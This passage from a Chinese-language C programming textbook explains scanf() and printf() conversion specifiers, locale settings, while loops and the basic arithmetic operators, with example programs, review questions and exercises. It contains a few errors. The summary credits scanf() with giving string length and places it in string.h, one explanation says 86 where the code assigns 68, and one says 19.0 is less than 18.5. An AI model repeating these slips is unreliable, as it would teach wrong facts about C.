// 这里要使用& scanf("%s", pet);        // 字符数组不使用& printf("%d $%.2f %s\n", age, assets, pet); return 0; } 下面是该程序与用户交互的示例: Enter your age, assets, and favorite pet. 38 218 92360.88 llama 38 $92360.88 llama scanf()函数使用空白(换行符、制表符和空格)把输入分成多个字段。 在依次把转换说明和字段匹配时跳过空白。注意,上面示例的输入项(粗体 部分是用户的输入)分成了两行。只要在每个输入项之间输入至少一个换行 符、空格或制表符即可,可以在一行或多行输入: Enter your age, assets, and favorite pet. 42 2121.45 guppy 42 $2121.45 guppy 唯一例外的是%c转换说明。根据%c,scanf()会读取每个字符,包括空 白。我们稍后详述这部分。 scanf()函数所用的转换说明与printf()函数几乎相同。主要的区别是,对 于float类型和double类型,printf()都使用%f、%e、%E、%g和%G转换说 明。而scanf()只把它们用于float类型,对于double类型时要使用l修饰符。表 4.6列出了C99标准中常用的转换说明。 表4.6 ANSI C中scanf()的转换说明 219 可以在表4.6所列的转换说明中(百分号和转换字符之间)使用修饰 符。如果要使用多个修饰符,必须按表4.7所列的顺序书写。 表4.7 scanf()转换说明中的修饰符 续表 220 如你所见,使用转换说明比较复杂,而且这些表中还省略了一些特性。 省略的主要特性是,从高度格式化源中读取选定数据,如穿孔卡或其他数据 记录。因为在本书中,scanf()主要作为与程序交互的便利工具,所以我们不 在书中讨论更复杂的特性。 1.从scanf()角度看输入 接下来,我们更详细地研究scanf()怎样读取输入。假设scanf()根据一 个%d转换说明读取一个整数。scanf()函数每次读取一个字符,跳过所有的 空白字符,直至遇到第1个非空白字符才开始读取。因为要读取整数,所以 scanf()希望发现一个数字字符或者一个符号(+或-)。如果找到一个数字或 符号,它便保存该字符,并读取下一个字符。如果下一个字符是数字,它便 保存该数字并读取下一个字符。scanf()不断地读取和保存字符,直至遇到非 数字字符。如果遇到一个非数字字符,它便认为读到了整数的末尾。然后, scanf()把非数字字符放回输入。这意味着程序在下一次读取输入时,首先读 到的是上一次读取丢弃的非数字字符。最后,scanf()计算已读取数字(可能 还有符号)相应的数值,并将计算后的值放入指定的变量中。 如果使用字段宽度,scanf()会在字段结尾或第1个空白字符处停止读取 (满足两个条件之一便停止)。 如果第1个非空白字符是A而不是数字,会发生什么情况?scanf()将停在 221 那里,并把A放回输入中,不会把值赋给指定变量。程序在下一次读取输入 时,首先读到的字符是A。如果程序只使用%d转换说明, scanf()就一直无 法越过A读下一个字符。另外,如果使用带多个转换说明的scanf(),C规定 在第1个出错处停止读取输入。 用其他数值匹配的转换说明读取输入和用%d 的情况相同。区别在于 scanf()会把更多字符识别成数字的一部分。例如,%x转换说明要求scanf()识 别十六进制数a~f和A~F。浮点转换说明要求scanf()识别小数点、e记数法 (指数记数法)和新增的p记数法(十六进制指数记数法)。 如果使用%s 转换说明,scanf()会读取除空白以外的所有字符。scanf()跳 过空白开始读取第 1 个非空白字符,并保存非空白字符直到再次遇到空白。 这意味着 scanf()根据%s 转换说明读取一个单词,即不包含空白字符的字符 串。如果使用字段宽度,scanf()在字段末尾或第1个空白字符处停止读取。 无法利用字段宽度让只有一个%s的scanf()读取多个单词。最后要注意一点: 当scanf()把字符串放进指定数组中时,它会在字符序列的末尾加上'\0',让数 组中的内容成为一个C字符串。 实际上,在C语言中scanf()并不是最常用的输入函数。这里重点介绍它 是因为它能读取不同类型的数据。C 语言还有其他的输入函数,如 getchar() 和 fgets()。这两个函数更适合处理一些特殊情况,如读取单个字符或包含空 格的字符串。我们将在第7章、第11章、第13章中讨论这些函数。目前,无 论程序中需要读取整数、小数、字符还是字符串,都可以使用scanf()函数。 2.格式字符串中的普通字符 scanf()函数允许把普通字符放在格式字符串中。除空格字符外的普通字 符必须与输入字符串严格匹配。例如,假设在两个转换说明中添加一个逗 号: scanf("%d,%d", &n, &m); scanf()函数将其解释成:用户将输入一个数字、一个逗号,然后再输入 222 一个数字。也就是说,用户必须像下面这样进行输入两个整数: 88,121 由于格式字符串中,%d后面紧跟逗号,所以必须在输入88后再输入一 个逗号。但是,由于scanf()会跳过整数前面的空白,所以下面两种输入方式 都可以: 88, 121 和 88, 121 格式字符串中的空白意味着跳过下一个输入项前面的所有空白。例如, 对于下面的语句: scanf("%d ,%d", &n, &m); 以下的输入格式都没问题: 88,121 88 ,121 88 , 121 请注意,“所有空白”的概念包括没有空格的特殊情况。 除了%c,其他转换说明都会自动跳过待输入值前面所有的空白。因 此,scanf("%d%d", &n, &m)与scanf("%d %d", &n, &m)的行为相同。对 于%c,在格式字符串中添加一个空格字符会有所不同。例如,如果把%c放 在格式字符串中的空格前面,scanf()便会跳过空格,从第1个非空白字符开 始读取。也就是说,scanf("%c", &ch)从输入中的第1个字符开始读取,而 223 scanf(" %c", &ch)则从第1个非空白字符开始读取。 3.scanf()的返回值 scanf()函数返回成功读取的项数。如果没有读取任何项,且需要读取一 个数字而用户却输入一个非数值字符串,scanf()便返回0。当scanf()检测 到“文件结尾”时,会返回EOF(EOF是stdio.h中定义的特殊值,通常用 #define指令把EOF定义为-1)。我们将在第6章中讨论文件结尾的相关内容 以及如何利用scanf()的返回值。在读者学会if语句和while语句后,便可使用 scanf()的返回值来检测和处理不匹配的输入。 4.4.6 printf()和scanf()的*修饰符 printf()和scanf()都可以使用*修饰符来修改转换说明的含义。但是,它 们的用法不太一样。首先,我们来看printf()的*修饰符。 如果你不想预先指定字段宽度,希望通过程序来指定,那么可以用*修 饰符代替字段宽度。但还是要用一个参数告诉函数,字段宽度应该是多少。 也就是说,如果转换说明是%*d,那么参数列表中应包含*和 d对应的值。这 个技巧也可用于浮点值指定精度和字段宽度。程序清单4.16演示了相关用 法。 程序清单4.16 varwid.c程序 /* varwid.c -- 使用变宽输出字段 */ #include <stdio.h> int main(void) { unsigned width, precision; int number = 256; 224 double weight = 242.5; printf("Enter a field width:\n"); scanf("%d", &width); printf("The number is :%*d:\n", width, number); printf("Now enter a width and a precision:\n"); scanf("%d %d", &width, &precision); printf("Weight = %*.*f\n", width, precision, weight); printf("Done!\n"); return 0; } 变量width提供字段宽度,number是待打印的数字。因为转换说明中*在 d的前面,所以在printf()的参数列表中,width在number的前面。同样,width 和precision提供打印weight的格式化信息。下面是一个运行示例: Enter a field width: 6 The number is : 256: Now enter a width and a precision: 8 3 Weight = 242.500 Done! 225 这里,用户首先输入6,因此6是程序使用的字段宽度。类似地,接下来 用户输入8和3,说明字段宽度是8,小数点后面显示3位数字。一般而言,程 序应根据weight的值来决定这些变量的值。 scanf()中*的用法与此不同。把*放在%和转换字符之间时,会使得 scanf()跳过相应的输出项。程序清单4.17就是一个例子。 程序清单4.17 skip2.c程序 /* skiptwo.c -- 跳过输入中的前两个整数 */ #include <stdio.h> int main(void) { int n; printf("Please enter three integers:\n"); scanf("%*d %*d %d", &n); printf("The last integer was %d\n", n); return 0; } 程序清单4.17中的scanf()指示:跳过两个整数,把第3个整数拷贝给n。 下面是一个运行示例: Please enter three integers: 2013 2014 2015 226 The last integer was 2015 在程序需要读取文件中特定列的内容时,这项跳过功能很有用。 4.4.7 printf()的用法提示 想把数据打印成列,指定固定字段宽度很有用。因为默认的字段宽度是 待打印数字的宽度,如果同一列中打印的数字位数不同,那么下面的语句: printf("%d %d %d\n", val1, val2, val3); 打印出来的数字可能参差不齐。例如,假设执行3次printf()语句,用户 输入不同的变量,其输出可能是这样: 12 234 1222 4 5 23 22334 2322 10001 使用足够大的固定字段宽度可以让输出整齐美观。例如,若使用下面的 语句: printf("%9d %9d %9d\n", val1, val2, val3); 上面的输出将变成: 12   234   1222 4    5    23 22334   2322   10001 在两个转换说明中间插入一个空白字符,可以确保即使一个数字溢出了 自己的字段,下一个数字也不会紧跟该数字一起输出(这样两个数字看起来 像是一个数字)。这是因为格式字符串中的普通字符(包括空格)会被打印 227 出来。 另一方面,如果要在文字中嵌入一个数字,通常指定一个小于或等于该 数字宽度的字段会比较方便。这样,输出数字的宽度正合适,没有不必要的 空白。例如,下面的语句: printf("Count Beppo ran %.2f miles in 3 hours.\n", distance); 其输出如下: Count Beppo ran 10.22 miles in 3 hours. 如果把转换说明改为%10.2f,则输出如下: Count Beppo ran   10.22 miles in 3 hours. 本地化设置 美国和世界上的许多地区都使用一个点来分隔十进制值的整数部分和小 数部分,如3.14159。然而,许多其他地区用逗号来分隔,如 3,14159。读者 可能注意到了,printf()和 scanf()都没有提供逗号的转换说明。C语言考虑了 这种情况。本书附录B的参考资料V中介绍了C支持的本地化概念,因此C程 序可以选择特定的本地化设置。例如,如果指定了荷兰语言环境,printf()和 scanf()在显示和读取浮点值时会使用本地惯例(在这种情况下,用逗号代替 点分隔浮点值的整数部分和小数部分)。另外,一旦指定了环境,便可在代 码的数字中使用逗号: double pi = 3,14159; // 荷兰本地化设置 C标准有两个本地化设置:"C"和""(空字符串)。默认情况下,程序使 用"C"本地化设置,基本上符合美国的用法习惯。而""本地化设置可以替换 当前系统中使用的本地语言环境。原则上,这与"C"本地化设置相同。事实 上,大部分操作系统(如UNIX、Linux和Windows)都提供本地化设置选项 列表,只不过它们提供的列表可能不同。 228 4.5 关键概念 C语言用char类型表示单个字符,用字符串表示字符序列。字符常量是 一种字符串形式,即用双引号把字符括起来:"Good luck, my friend"。可以 把字符串储存在字符数组(由内存中相邻的字节组成)中。字符串,无论是 表示成字符常量还是储存在字符数组中,都以一个叫做空字符的隐藏字符结 尾。 在程序中,最好用#define 定义数值常量,用 const 关键字声明的变量为 只读变量。在程序中使用符号常量(明示常量),提高了程序的可读性和可 维护性。 C 语言的标准输入函数(scanf())和标准输出函数(printf())都使用一 种系统。在该系统中,第1个参数中的转换说明必须与后续参数中的值相匹 配。例如,int转换说明%d与一个浮点值匹配会产生奇怪的结果。必须格外 小心,确保转换说明的数量和类型与函数的其余参数相匹配。对于scanf(), 一定要记得在变量名前加上地址运算符(&)。 空白字符(制表符、空格和换行符)在 scanf()处理输入时起着至关重要 的作用。除了%c 模式(读取下一个字符),scanf()在读取输入时会跳过非 空白字符前的所有空白字符,然后一直读取字符,直至遇到空白字符或与正 在读取字符不匹配的字符。考虑一下,如果scanf()根据不同的转换说明读取 相同的输入行,会发生什么情况。假设有如下输入行: -13.45e12# 0 如果其对应的转换说明是%d,scanf()会读取3个字符(-13)并停在小数 点处,小数点将被留在输入中作为下一次输入的首字符。如果其对应的转换 说明是%f,scanf()会读取-13.45e12,并停在#符号处,而#将被留在输入中作 为下一次输入的首字符;然后,scanf()把读取的字符序列-13.45e12转换成相 应的浮点值,并储存在float类型的目标变量中。如果其对应的转换说明 是%s,scanf()会读取-13.45e12#,并停在空格处,空格将被留在输入中作为 229 下一次输入的首字符;然后,scanf()把这 10个字符的字符码储存在目标字符 数组中,并在末尾加上一个空字符。如果其对应的转换说明是%c,scanf() 只会读取并储存第1个字符,该例中是一个空格 [4]。 230 4.6 本章小结 字符串是一系列被视为一个处理单元的字符。在C语言中,字符串是以 空字符(ASCII码是0)结尾的一系列字符。可以把字符串储存在字符数组 中。数组是一系列同类型的项或元素。下面声明了一个名为name、有30个 char类型元素的数组: char name[30]; 要确保有足够多的元素来储存整个字符串(包括空字符)。 字符串常量是用双引号括起来的字符序列,如:"This is an example of a string"。 scanf()函数(声明在string.h头文件中)可用于获得字符串的长度(末尾 的空字符不计算在内)。scanf()函数中的转换说明是%s时,可读取一个单 词。 C预处理器为预处理器指令(以#符号开始)查找源代码程序,并在开 始编译程序之前处理它们。处理器根据#include指令把另一个文件中的内容 添加到该指令所在的位置。#define指令可以创建明示常量(符号常量),即 代表常量的符号。limits.h和float.h头文件用#define定义了一组表示整型和浮 点型不同属性的符号常量。另外,还可以使用const限定符创建定义后就不 能修改的变量。 printf()和scanf()函数对输入和输出提供多种支持。两个函数都使用格式 字符串,其中包含的转换说明表明待读取或待打印数据项的数量和类型。另 外,可以使用转换说明控制输出的外观:字段宽度、小数位和字段内的布 局。 231 4.7 复习题 复习题的参考答案在附录A中。 1.再次运行程序清单 4.1,但是在要求输入名时,请输入名和姓(根据 英文书写习惯,名和姓中间有一个空格),看看会发生什么情况?为什么? 2.假设下列示例都是完整程序中的一部分,它们打印的结果分别是什 么? a.printf("He sold the painting for $%2.2f.\n", 2.345e2); b.printf("%c%c%c\n", 'H', 105, '\41'); c.#define Q "His Hamlet was funny without being vulgar."printf("%s\nhas %d characters.\n", Q, strlen(Q)); d.printf("Is %2.2e the same as %2.2f?\n", 1201.0, 1201.0); 3.在第2题的c中,要输出包含双引号的字符串Q,应如何修改? 4.找出下面程序中的错误。 define B booboo define X 10 main(int) { int age; char name; printf("Please enter your first name."); 232 scanf("%s", name); printf("All right, %c, what's your age?\n", name); scanf("%f", age); xp = age + X; printf("That's a %s! You must be at least %d.\n", B, xp); rerun 0; } 5.假设一个程序的开头是这样: #define BOOK "War and Peace" int main(void) { float cost =12.99; float percent = 80.0; 请构造一个使用BOOK、cost和percent的printf()语句,打印以下内容: This copy of "War and Peace" sells for $12.99. That is 80% of list. 6.打印下列各项内容要分别使用什么转换说明? a.一个字段宽度与位数相同的十进制整数 b.一个形如8A、字段宽度为4的十六进制整数 233 c.一个形如232.346、字段宽度为10的浮点数 d.一个形如2.33e+002、字段宽度为12的浮点数 e.一个字段宽度为30、左对齐的字符串 7.打印下面各项内容要分别使用什么转换说明? a.字段宽度为15的unsigned long类型的整数 b.一个形如0x8a、字段宽度为4的十六进制整数 c.一个形如2.33E+02、字段宽度为12、左对齐的浮点数 d.一个形如+232.346、字段宽度为10的浮点数 e.一个字段宽度为8的字符串的前8个字符 8.打印下面各项内容要分别使用什么转换说明? a.一个字段宽度为6、最少有4位数字的十进制整数 b.一个在参数列表中给定字段宽度的八进制整数 c.一个字段宽度为2的字符 d.一个形如+3.13、字段宽度等于数字中字符数的浮点数 e.一个字段宽度为7、左对齐字符串中的前5个字符 9.分别写出读取下列各输入行的scanf()语句,并声明语句中用到变量和 数组。 a.101 b.22.32 8.34E−09 234 c.linguini d.catch 22 e.catch 22 (但是跳过catch) 10.什么是空白? 11.下面的语句有什么问题?如何修正? printf("The double type is %z bytes..\n", sizeof(double)); 12.假设要在程序中用圆括号代替花括号,以下方法是否可行? #define ( { #define ) } 235 4.8 编程练习 1.编写一个程序,提示用户输入名和姓,然后以“名,姓”的格式打印出 来。 2.编写一个程序,提示用户输入名和姓,并执行一下操作: a.打印名和姓,包括双引号; b.在宽度为20的字段右端打印名和姓,包括双引号; c.在宽度为20的字段左端打印名和姓,包括双引号; d.在比姓名宽度宽3的字段中打印名和姓。 3.编写一个程序,读取一个浮点数,首先以小数点记数法打印,然后以 指数记数法打印。用下面的格式进行输出(系统不同,指数记数法显示的位 数可能不同): a.输入21.3或2.1e+001; b.输入+21.290或2.129E+001; 4.编写一个程序,提示用户输入身高(单位:英寸)和姓名,然后以下 面的格式显示用户刚输入的信息: Dabney, you are 6.208 feet tall 使用float类型,并用/作为除号。如果你愿意,可以要求用户以厘米为 单位输入身高,并以米为单位显示出来。 5.编写一个程序,提示用户输入以兆位每秒(Mb/s)为单位的下载速度 和以兆字节(MB)为单位的文件大小。程序中应计算文件的下载时间。注 意,这里1字节等于8位。使用float类型,并用/作为除号。该程序要以下面 的格式打印 3 个变量的值(下载速度、文件大小和下载时间),显示小数点 236 后面两位数字: At 18.12 megabits per second, a file of 2.20 megabytes downloads in 0.97 seconds. 6.编写一个程序,先提示用户输入名,然后提示用户输入姓。在一行打 印用户输入的名和姓,下一行分别打印名和姓的字母数。字母数要与相应名 和姓的结尾对齐,如下所示: Melissa Honeybee 7    8 接下来,再打印相同的信息,但是字母个数与相应名和姓的开头对齐, 如下所示: Melissa Honeybee 7    8 7.编写一个程序,将一个double类型的变量设置为1.0/3.0,一个float类 型的变量设置为1.0/3.0。分别显示两次计算的结果各3次:一次显示小数点 后面6位数字;一次显示小数点后面12位数字;一次显示小数点后面16位数 字。程序中要包含float.h头文件,并显示FLT_DIG和DBL_DIG的值。1.0/3.0 的值与这些值一致吗? 8.编写一个程序,提示用户输入旅行的里程和消耗的汽油量。然后计算 并显示消耗每加仑汽油行驶的英里数,显示小数点后面一位数字。接下来, 使用1加仑大约3.785升,1英里大约为1.609千米,把单位是英里/加仑的值转 换为升/100公里(欧洲通用的燃料消耗表示法),并显示结果,显示小数点 后面 1 位数字。注意,美国采用的方案测量消耗单位燃料的行程(值越大越 好),而欧洲则采用单位距离消耗的燃料测量方案(值越低越好)。使用 #define 创建符号常量或使用 const 限定符创建变量来表示两个转换系数。 237 [1].其实,符号常量的概念在K&R合著的《C语言程序设计》中介绍过。但 是,在历年的C标准中(包括最新的C11),并没有符号常量的概念,只提 到过#define最简单的用法是定义一个“明示常量”。市面上各编程书籍对此概 念的理解不同,有些作者把#define宏定义实现的“常量”归为“明示常量”;有 些作者(如,本书的作者)则认为“明示常量”相当于“符号常量”。——译者 注 [2].注意,在C语言中,用const类型限定符声明的是变量,不是常量。—— 译者注 [3].再次提醒读者注意,本书作者认为“明示常量”相当于“符号常量”,经常 在书中混用这两个术语。——译者注 [4].注意,“ -13.45e12# 0”的负号前面有一个空格。——译者注 238 第5章 运算符、表达式和语句 本章介绍以下内容: 关键字:while、typedef 运算符:=、-、*、/、%、++、--、(类型名) C语言的各种运算符,包括用于普通数学运算的运算符 运算符优先级以及语句、表达式的含义 while循环 复合语句、自动类型转换和强制类型转换 如何编写带有参数的函数 现在,读者已经熟悉了如何表示数据,接下来我们学习如何处理数据。 C 语言为处理数据提供了大量的操作,可以在程序中进行算术运算、比较值 的大小、修改变量、逻辑地组合关系等。我们先从基本的算术运算(加、 减、乘、除)开始。 组织程序是处理数据的另一个方面,让程序按正确的顺序执行各个步 骤。C 有许多语言特性,帮助你完成组织程序的任务。循环就是其中一个特 性,本章中你将窥其大概。循环能重复执行行为,让程序更有趣、更强大。 239 5.1 循环简介 程序清单5.1是一个简单的程序示例,该程序进行了简单的运算,计算 穿9码男鞋的脚长(单位:英寸)。为了让读者体会循环的好处,程序的第1 个版本演示了不使用循环编程的局限性。 程序清单5.1 shoes1.c程序 /* shoes1.c -- 把鞋码转换成英寸 */ #include <stdio.h> #define ADJUST 7.31          // 字符常量 int main(void) { const double SCALE = 0.333;// const变量 double shoe, foot; shoe = 9.0; foot = SCALE * shoe + ADJUST; printf("Shoe size (men's)   foot length\n"); printf("%10.1f %15.2f inches\n", shoe, foot); return 0; } 该程序的输出如下: 240 Shoe size (men's) foot length 9.0       10.31 inches 该程序演示了用#define 指令创建符号常量和用 const 限定符创建在程序 运行过程中不可更改的变量。程序使用了乘法和加法,假定用户穿9码的 鞋,以英寸为单位打印用户的脚长。你可能会说:“这太简单了,我用笔算 比敲程序还要快。”说得没错。写出来的程序只使用一次(本例即只根据一 只鞋的尺码计算一次脚长),实在是浪费时间和精力。如果写成交互式程序 会更有用,但是仍无法利用计算机的优势。 应该让计算机做一些重复计算的工作。毕竟,需要重复计算是使用计算 机的主要原因。C 提供多种方法做重复计算,我们在这里简单介绍一种—— while循环。它能让你对运算符做更有趣地探索。程序清单5.2演示了用循环 改进后的程序。 程序清单5.2 shoes2.c程序 /* shoes2.c -- 计算多个不同鞋码对应的脚长 */ #include <stdio.h> #define ADJUST 7.31          // 字符常量 int main(void) { const double SCALE = 0.333;// const变量 double shoe, foot; printf("Shoe size (men's)   foot length\n"); shoe = 3.0; 241 while (shoe < 18.5)      /* while循环开始 */ {               /* 块开始 */ foot = SCALE * shoe + ADJUST; printf("%10.1f %15.2f inches\n", shoe, foot); shoe = shoe + 1.0; }               /* 块结束    */ printf("If the shoe fits, wear it.\n"); return 0; } 下面是shoes2.c程序的输出(...表示并未显示完整,有删节): Shoe size (men's) foot length 3.0       8.31 inches 4.0       8.64 inches 5.0       8.97 inches 6.0       9.31 inches ... 16.0     12.64 inches 17.0     12.97 inches 18.0     13.30 inches 242 If the shoe fits, wear it. (如果读者对此颇有研究,应该知道该程序不符合实际情况。程序中假 定了一个统一的鞋码系统。) 下面解释一下while循环的原理。当程序第1次到达while循环时,会检查 圆括号中的条件是否为真。该程序中,条件表达式如下: shoe < 18.5 符号<的意思是小于。变量shoe被初始化为3.0,显然小于18.5。因此, 该条件为真,程序进入块中继续执行,把尺码转换成英寸。然后打印计算的 结果。下一条语句把 shoe增加1.0,使shoe的值为4.0: shoe = shoe + 1.0; 此时,程序返回while入口部分检查条件。为何要返回while的入口部 分?因为上面这条语句的下面是右花括号(}),代码使用一对花括号 ({})来标出while循环的范围。花括号之间的内容就是要被重复执行的内 容。花括号以及被花括号括起来的部分被称为块(block)。现在,回到程 序中。因为4小于18.5,所以要重复执行被花括号括起来的所有内容(用计 算机术语来说就是,程序循环这些语句)。该循环过程一直持续到shoe的值 为19.0。此时,由于19.0小于18.5,所以该条件为假: shoe < 18.5 出现这种情况后,控制转到紧跟while循环后面的第1条语句。该例中, 是最后的printf()语句。 可以很方便地修改该程序用于其他转换。例如,把SCALE设置成1.8、 ADJUST设置成32.0,该程序便可把摄氏温度转换成华氏温度;把SCALE设 置成0.6214、ADJUST设置成0,该程序便可把公里转换成英里。注意,修改 了设置后,还要更改打印的消息,以免前后表述不一。 243 通过while循环能便捷灵活地控制程序。现在,我们来学习程序中会用 到的基本运算符。 244 5.2 基本运算符 C用运算符(operator)表示算术运算。例如,+运算符使在它两侧的值 加在一起。如果你觉得术语“运算符”很奇怪,那么请记住东西总得有个名 称。与其叫“那些东西”或“运算处理符”,还不如叫“运算符”。现在,我们介 绍一下用于基本算术运算的运算符:=、+、-、*和/(C 没有指数运算符。 不过,C 的标准数学库提供了一个pow()函数用于指数运算。例如,pow(3.5, 2.2)返回3.5的2.2次幂)。 5.2.1 赋值运算符:= 在C语言中,=并不意味着“相等”,而是一个赋值运算符。下面的赋值 表达式语句: bmw = 2002; 把值2002赋给变量bmw。也就是说,=号左侧是一个变量名,右侧是赋 给该变量的值。符号=被称为赋值运算符。另外,上面的语句不读作“bmw等 于2002”,而读作“把值2002赋给变量bmw”。赋值行为从右往左进行。 也许变量名和变量值的区别看上去微乎其微,但是,考虑下面这条常用 的语句: i = i + 1; 对数学而言,这完全行不通。如果给一个有限的数加上 1,它不可 能“等于”原来的数。但是,在计算机赋值表达式语句中,这很合理。该语句 的意思是:找出变量 i 的值,把该值加 1,然后把新值赋值变量i(见图 5.1)。 245 图5.1 语句i = i + 1; 在C语言中,类似这样的语句没有意义(实际上是无效的): 2002 = bmw; 因为在这种情况下,2002 被称为右值(rvale),只能是字面常量。不 能给常量赋值,常量本身就是它的值。因此,在编写代码时要记住,=号左 侧的项必须是一个变量名。实际上,赋值运算符左侧必须引用一个存储位 置。最简单的方法就是使用变量名。不过,后面章节还会介绍“指针”,可用 于指向一个存储位置。概括地说,C 使用可修改的左值(modifiable lvalue) 标记那些可赋值的实体。也许“可修改的左值”不太好懂,我们再来看一些定 义。 几个术语:数据对象、左值、右值和运算符 赋值表达式语句的目的是把值储存到内存位置上。用于储存值的数据存 储区域统称为数据对象(data object)。C 标准只有在提到这个概念时才会 用到对象这个术语。使用变量名是标识对象的一种方法。除此之外,还有其 他方法,但是要在后面的章节中才学到。例如,可以指定数组的元素、结构 的成员,或者使用指针表达式(指针中储存的是它所指向对象的地址)。左 值(lvalue)是 C 语言的术语,用于标识特定数据对象的名称或表达式。因 此,对象指的是实际的数据存储,而左值是用于标识或定位存储位置的标 签。 对于早期的C语言,提到左值意味着: 1.它指定一个对象,所以引用内存中的地址; 246 2.它可用在赋值运算符的左侧,左值(lvalue)中的l源自left。 但是后来,标准中新增了const限定符。用const创建的变量不可修改。 因此,const标识符满足上面的第1项,但是不满足第2项。一方面C继续把标 识对象的表达式定义为左值,一方面某些左值却不能放在赋值运算符的左 侧。有些左值不能用于赋值运算符的左侧。此时,标准对左值的定义已经不 能满足当前的状况。 为此,C标准新增了一个术语:可修改的左值(modifiable lvalue),用 于标识可修改的对象。所以,赋值运算符的左侧应该是可修改的左值。当前 标准建议,使用术语对象定位值(object locator value)更好。 右值(rvalue)指的是能赋值给可修改左值的量,且本身不是左值。例 如,考虑下面的语句: bmw = 2002; 这里,bmw是可修改的左值,2002是右值。读者也许猜到了,右值中的 r源自right。右值可以是常量、变量或其他可求值的表达式(如,函数调 用)。实际上,当前标准在描述这一概念时使用的是表达式的值(value of an expression),而不是右值。 我们看几个简单的示例: int ex; int why; int zee; const int TWO = 2; why = 42; zee = why; 247 ex = TWO * (why + zee); 这里,ex、why和zee都是可修改的左值(或对象定位值),它们可用于 赋值运算符的左侧和右侧。TWO是不可改变的左值,它只能用于赋值运算 符的右侧(在该例中,TWO被初始化为2,这里的=运算符表示初始化而不 是赋值,因此并未违反规则)。同时,42 是右值,它不能引用某指定内存 位置。另外,why和 zee 是可修改的左值,表达式(why + zee)是右值,该表 达式不能表示特定内存位置,而且也不能给它赋值。它只是程序计算的一个 临时值,在计算完毕后便会被丢弃。 在学习名称时,被称为“项”(如,赋值运算符左侧的项)的就是运算对 象(operand)。运算对象是运算符操作的对象。例如,可以把吃汉堡描述 为:“吃”运算符操作“汉堡”运算对象。类似地可以说,=运算符的左侧运算 对象应该是可修改的左值。 C的基本赋值运算符有些与众不同,请看程序清单5.3。 程序清单5.3 golf.c程序 /* golf.c -- 高尔夫锦标赛记分卡 */ #include <stdio.h> int main(void) { int jane, tarzan, cheeta; cheeta = tarzan = jane = 68; printf("            cheeta  tarzan   jane\n"); printf("First round score %4d %8d %8d\n", cheeta, tarzan,  jane); 248 return 0; } 许多其他语言都会回避该程序中的三重赋值,但是C完全没问题。赋值 的顺序是从右往左:首先把86赋给jane,然后再赋给tarzan,最后赋给 cheeta。因此,程序的输出如下: cheetah  tarzan    jane First round score  68      68      68 5.2.2 加法运算符:+ 加法运算符(addition operator)用于加法运算,使其两侧的值相加。例 如,语句: printf("%d", 4 + 20); 打印的是24,而不是表达式 4 + 20 相加的值(运算对象)可以是变量,也可以是常量。因此,执行下面的 语句: income = salary + bribes; 计算机会查看加法运算符右侧的两个变量,把它们相加,然后把和赋给 变量income。 在此提醒读者注意,income、salary和bribes都是可修改的左值。因为每 个变量都标识了一个可被赋值的数据对象。但是,表达式salary + brives是一 个右值。 5.2.3 减法运算符:- 249 减法运算符(subtraction operator)用于减法运算,使其左侧的数减去右 侧的数。例如,下面的语句把200.0赋给takehome: takehome = 224.00 – 24.00; +和-运算符都被称为二元运算符(binary operator),即这些运算符需要 两个运算对象才能完成操作。 5.2.4 符号运算符:-和+ 减号还可用于标明或改变一个值的代数符号。例如,执行下面的语句 后,smokey的值为12: rocky = –12; smokey = –rocky;以这种方式使用的负号被称为一元运算符(unary operator)。一元运算符只需要一个运算对象(见图5.2)。 C90标准新增了一元+运算符,它不会改变运算对象的值或符号,只能 这样使用: dozen = +12; 编译器不会报错。但是在以前,这样做是不允许的。 250 图5.2 一元和二元运算符 5.2.5 乘法运算符:* 符号*表示乘法。下面的语句用2.54乘以inch,并将结果赋给cm: cm = 2.54 * inch; C没有平方函数,如果要打印一个平方表,怎么办?如程序清单5.4所 示,可以使用乘法来计算平方。 程序清单5.4 squares.c程序 251 /* squares.c -- 计算1~20的平方 */ #include <stdio.h> int main(void) { int num = 1; while (num < 21) { printf("%4d %6d\n", num, num * num); num = num + 1; } return 0; } 该程序打印数字1~20及其平方。接下来,我们再看一个更有趣的例 子。 1.指数增长 读者可能听过这样一个故事,一位强大的统治者想奖励做出突出贡献的 学者。他问这位学者想要什么,学者指着棋盘说,在第1个方格里放1粒小 麦、第2个方格里放2粒小麦、第3个方格里放4粒小麦,第4个方格里放 8 粒 小麦,以此类推。这位统治者不熟悉数学,很惊讶学者竟然提出如此谦虚的 要求。因为他原本准备奖励给学者一大笔财产。如果程序清单5.5运行的结 果正确,这显然是跟统治者开了一个玩笑。程序计算出每个方格应放多少小 麦,并计算了总数。可能大多数人对小麦的产量不熟悉,该程序以谷粒数为 252 单位,把计算的小麦总数与粗略估计的世界小麦年产量进行了比较。 程序清单5.5 wheat.c程序 /* wheat.c -- 指数增长 */ #include <stdio.h> #define SQUARES 64       // 棋盘中的方格数 int main(void) { const double CROP = 2E16; // 世界小麦年产谷粒数 double current, total; int count = 1; printf("square    grains     total    "); printf("fraction of \n"); printf("       added     grains   "); printf("world total\n"); total = current = 1.0;   /* 从1颗谷粒开始 */ printf("%4d %13.2e %12.2e %12.2e\n", count, current, total, total / CROP); while (count < SQUARES) { 253 count = count + 1; current = 2.0 * current;  /* 下一个方格谷粒翻倍 */ total = total + current;  /* 更新总数 */ printf("%4d %13.2e %12.2e %12.2e\n", count, current, total, total / CROP); } printf("That's all.\n"); return 0; } 程序的输出结果如下: square      grains      total       fraction of added       grains      world total 1        1.00e+00    1.00e+00    5.00e-17 2        2.00e+00    3.00e+00    1.50e-16 3        4.00e+00    7.00e+00    3.50e-16 4        8.00e+00    1.50e+01    7.50e-16 5        1.60e+01    3.10e+01    1.55e-15 6        3.20e+01    6.30e+01    3.15e-15 7        6.40e+01    1.27e+02    6.35e-15 254 8        1.28e+02    2.55e+02    1.27e-14 9        2.56e+02    5.11e+02    2.55e-14 10       5.12e+02    1.02e+03    5.12e-14 10个方格以后,该学者得到的小麦仅超过了1000粒。但是,看看55个方 格的小麦数是多少: 55      1.80e+16    3.60e+16    1.80e+00 总量已超过了世界年产量!不妨自己动手运行该程序,看看第64个方格 有多少小麦。 这个程序示例演示了指数增长的现象。世界人口增长和我们使用的能源 都遵循相同的模式。 5.2.6 除法运算符:/ C使用符号/来表示除法。/左侧的值是被除数,右侧的值是除数。例 如,下面four的值是4.0: four = 12.0/3.0; 整数除法和浮点数除法不同。浮点数除法的结果是浮点数,而整数除法 的结果是整数。整数是没有小数部分的数。这使得5除以3很让人头痛,因为 实际结果有小数部分。在C语言中,整数除法结果的小数部分被丢弃,这一 过程被称为截断(truncation)。 运行程序清单5.6中的程序,看看截断的情况,体会整数除法和浮点数 除法的区别。 